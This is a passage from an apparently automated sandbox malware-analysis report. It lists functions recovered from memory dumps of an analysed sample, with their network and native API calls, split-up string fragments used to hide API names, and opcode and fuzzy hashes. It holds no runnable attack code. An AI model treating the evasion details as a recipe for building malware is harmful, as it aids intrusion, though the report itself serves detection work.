athan, xrefs: 02975DDF
`, xrefs: 02975C3D

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: CreateFile
String ID: `$athan
API String ID: 823142352-1522545068
Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction ID: b58a48bfd15f356d49838c1c041c6f15b3cbd219df6e34d80db15ff70810bb6b
Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction Fuzzy Hash: 5F224B70A18E099FCB99DF28C4997AAF7E5FB98305F81462EE45ED3250DB30A451CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02973058, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 02973047

Strings

ket, xrefs: 0297301A
clos, xrefs: 0297300A
esoc, xrefs: 02973012

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
Instruction ID: 5a8d136f7aaee5f6099d927ad6d6595dbf6348d1d4419387045fd96fa00dcd44
Opcode Fuzzy Hash: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
Instruction Fuzzy Hash: DCF0C87051CB488BCB84EF1490897AAB7F1F79A354F9815BDE84ECB209C77585468707

Uniqueness

Uniqueness Score: -1.00%

Function 02972FEC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 02973047

Strings

ket, xrefs: 0297301A
clos, xrefs: 0297300A
esoc, xrefs: 02973012

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
Instruction ID: d4a305a88831e3709be693ee2236dffef4bb83866f6e759b9177ba785488dff2
Opcode Fuzzy Hash: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
Instruction Fuzzy Hash: 31F0907051CB088FCB80EF289089BAABBE0FB89315F5406ADE88ECB205C77585468707

Uniqueness

Uniqueness Score: -1.00%

Function 02972FF2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 02973047

Strings

ket, xrefs: 0297301A
clos, xrefs: 0297300A
esoc, xrefs: 02973012

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction ID: 40a11c0f025c2db021a3810c5aa204b4498b9a7e3534de0838d9d55d165e9a9a
Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction Fuzzy Hash: 99F03A7061CB089FCB84EF18D088B6ABBE1FB89314F5446ADF44ECB245C77589428B07

Uniqueness

Uniqueness Score: -1.00%

Function 02972F72, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 02972FD1

Strings

conn, xrefs: 02972F9A
ect, xrefs: 02972FA1

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction ID: 661d601ce5c7487938dfca638bec60f1ac40f04ba594d12e2bfe53682f11e742
Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction Fuzzy Hash: EB012C70618A0C8FCB84EF5CE088B55BBE0EB59314F1541AEE80DCB266CB74C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 02972F6E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 02972FD1

Strings

conn, xrefs: 02972F9A
ect, xrefs: 02972FA1

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
Instruction ID: 2ff710bd9f4ba4fcd76c37bb7d0ac4b01f154efc59151c0edaa7f68af8dd6e5d
Opcode Fuzzy Hash: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
Instruction Fuzzy Hash: E7017170618A0C8FCB84EF1CD088B55B7E0FB59310F1545AED84DCB266CB74C8818BC1

Uniqueness

Uniqueness Score: -1.00%

Function 02972DEF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 02972E51

Strings

sock, xrefs: 02972E19

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
Instruction ID: 50196854b35432584918246c87e53012b83a9585ff0b666509823ed8b51eb14d
Opcode Fuzzy Hash: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
Instruction Fuzzy Hash: 90117C70A187488FCB44EF18A448B40BBE0EF59310F1645EED84DCB267C7B4C9828B82

Uniqueness

Uniqueness Score: -1.00%

Function 02972EF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 02972F53

Strings

send, xrefs: 02972F1A

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction ID: bab428a9e682b727a7b503d6c8a25a6e88fd86fceace9333c30eb6f33bcbf27f
Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction Fuzzy Hash: E4011270518A088FDBC4EF1CD048B1577E1EB58314F1545AE985DCB266CA70D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 02972DF2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 02972E51

Strings

sock, xrefs: 02972E19

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction ID: 84af110bcddd48318bee078ba56c1699463cc487f0303162f6d78b0b228194df
Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction Fuzzy Hash: 51012C70618A088FCB84EF1CE048B55BBE4FB59314F1545AEE85ECB266C7B0C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 0296B2C9, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0296B31D

Memory Dump Source

Source File: 00000006.00000002.2365518340.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
Instruction ID: 1e093c41084faae43d009d4d76b2237069547622e441e38185f78e7f518a18cc
Opcode Fuzzy Hash: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
Instruction Fuzzy Hash: C3318A74A05B09CECB64EF25809C7A5B3E5FB84308F18427F892DDA206DB309450CF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: help.exe PID: 260 Parent PID: 1388 help.exeCOMMON

Executed Functions

Function 00099F2A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099F7D

Strings

.z`, xrefs: 00099F6D, 00099F78

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: e317ba30e6de6d584fbc9a56359cc8c501f0327b26af261596f981a62a4f3881
Instruction ID: 67439ba7e0eba7de80ba516f86164885b3f3d3e5daf9877278d4238aae6ab50d
Opcode Fuzzy Hash: e317ba30e6de6d584fbc9a56359cc8c501f0327b26af261596f981a62a4f3881
Instruction Fuzzy Hash: 1C21C4B2211108AFCB08DF89DC91EEB77ADAF8C754F158258FA1D97251D630EC51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A08A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 0009A085

Strings

M, xrefs: 0009A07C, 0009A084

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-4211545630
Opcode ID: 1cfb8e3fab9ae5748064268f0c7927cb995e0008137f89ff16472a5151aa3b60
Instruction ID: 48385db17bb4cbabbd0606a3b42f1aeedbccea1593ac3109d6ad1ceb706e52ca
Opcode Fuzzy Hash: 1cfb8e3fab9ae5748064268f0c7927cb995e0008137f89ff16472a5151aa3b60
Instruction Fuzzy Hash: DF017CB5610204AFDF10EF98DC85EEB7BA9EF88310F118659FA1897242D630E9558BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00099F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099F7D

Strings

.z`, xrefs: 00099F6D, 00099F78

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: fe7c9194b6b0ab1050a5d27050600036ee129ee6e25f5e63f92fdbd2ee117d3a
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: CCF0B2B2211208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0009A05D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 0009A085

Strings

M, xrefs: 0009A07C, 0009A084

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-4211545630
Opcode ID: fd3db9b483eaa564b7d5545403572c379bfd5f74589debe023358c8e2ee3c402
Instruction ID: fcca9a5f66d788fcad9e11ef599942a117bcfdaef2dac000962139c5dfbdd9b4
Opcode Fuzzy Hash: fd3db9b483eaa564b7d5545403572c379bfd5f74589debe023358c8e2ee3c402
Instruction Fuzzy Hash: DED012766401106BDB14EBD4CC45FD77B59EF45760F154595B91DAB242C630EA0186D0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 0009A085

Strings

M, xrefs: 0009A07C, 0009A084

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-4211545630
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: fa0d29f68914f182c85d2b2766fad1c48e68e78e57f0594d8cc0801a934417fc
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: EDD012752002146BDB10EB98CC45FD7775DEF44750F154555BA185B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00099FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 0009A025

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 9ac6dcb7425ff9580dcd526738ba31436931f035d1dedd041e7abe9a2418c2d2
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 37F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158248BE1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A10B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A149

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3c4d03c8f6f572c4c8a43a983ab264bce3dd6fd9fad7c77ab3c061186be70419
Instruction ID: 7e0adf790899c1aba722e2f9b56a52091de0e39e0d6ea607f3ff6c6cd29b0c5f
Opcode Fuzzy Hash: 3c4d03c8f6f572c4c8a43a983ab264bce3dd6fd9fad7c77ab3c061186be70419
Instruction Fuzzy Hash: 91F015B2210208ABCB14DF88CC91EEB77ADAF8C750F118249BE0897242C630E911CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A149

Memory Dump Source

Source File: 00000007.00000002.2363285705.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 23a9ce717d62c3afcb7a727465a0c28753ceafbb5b3cfe6d97ada4d9748f0c21
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 27F015B2210208ABCB14DF89CC81EEB77ADAF88750F118248BE0897242C630F811CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A000C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A000CF

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A007AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A007B7

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 009FF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FF9FB

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 009FF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FF90E

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFAC3

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFADB

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFAF3

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 009FFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFBC3

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFB5B

Memory Dump Source

Source File: 00000007.00000002.2363639727.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000007.00000002.2363635489.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363755400.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363761335.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363766569.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363772109.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363777488.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2363824875.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 009FFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFB73

Memory Dump Source

